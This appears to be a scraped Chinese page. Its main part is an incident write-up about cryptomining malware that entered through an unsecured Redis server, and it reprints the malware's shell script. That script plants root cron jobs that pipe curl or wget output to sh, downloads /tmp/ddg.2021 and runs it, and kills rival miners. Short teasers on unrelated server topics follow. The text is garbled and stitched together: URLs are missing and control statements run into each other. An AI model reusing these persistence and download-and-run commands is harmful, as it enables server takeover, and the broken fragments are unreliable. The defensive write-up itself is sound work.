*/5 * * * * curl -fssl | sh
*/5 * * * * wget -q -o- | sh
iptables -a input -s xmr.crypto-pool.fr -j drop
iptables -a output -d xmr.crypto-pool.fr -j drop
保險起見ps aux |grep imwbr1 這個是剛剛刪除的tmp資料夾下有執行許可權的檔案,也並沒有該程序,仔細檢查top之後,發現恢復正常。
這種掛馬鑽的空子總是新專案測試專案的redis沒有安全防護,用的預設配置,免密遠端登入。大家多多注意安全,做好防護。安全生產最重要!
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fssl | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -o- | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fssl | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -o- | sh" >> /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.2021" ]; then
curl -fssl -m) -o /tmp/ddg.2021
fiif [ ! -f "/tmp/ddg.2021" ]; then
wget -q -m) -o /tmp/ddg.2021
fichmod +x /tmp/ddg.2021 && /tmp/ddg.2021
if [ ! -f "/tmp/imwbr1" ]; then
curl -fssl -o /tmp/imwbr1 --compressed
fips auxf | grep -v grep | grep circle_mi | awk '' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '' | kill
netmask=255.255.255.0
阿里雲伺服器簡單掛盤
1 先檢視下磁碟 df h 2 檢視下磁碟掛載情況 fdisk l 3 格盤 fdisk dev vdb 4 檢視下磁碟掛載情況 fdisk l 5 快速格式化 mkfs.ext3 dev vdb1 6 建個alidata目錄 mkdir alidata 7 把掛載資訊寫到 etc fstab裡面 ...
linux 伺服器被掛馬 kswapd0 占用高
先 kill 掉這兩個程序。kill掉後程式占用果然下來了。檢查定時任務 果然有貓膩 修改定時任務,把病毒清理掉 crontab e最後重啟伺服器,發現果然沒有了。出現這樣的原因,有以下幾點。為了圖方便把允許 ssh 密碼登陸,同時密碼設定的過於簡單被爆破了。沒有把 ssh 埠修改掉 沒有開啟 ss...
處理WIN2003伺服器IIS被掛馬全過程
by wuchaochao 一台伺服器 幾乎所有 開啟網頁 甚至html網頁 都出現了 這種樣式的 有的在頭部 有的在尾部 部分防毒軟體開啟會報毒 開啟html或asp php頁面 在原始碼中怎麼也找不到這段 分析原因 首先懷疑arp掛馬,用防 的工具又沒有發現有arp欺騙 而且arp欺騙一般不會每...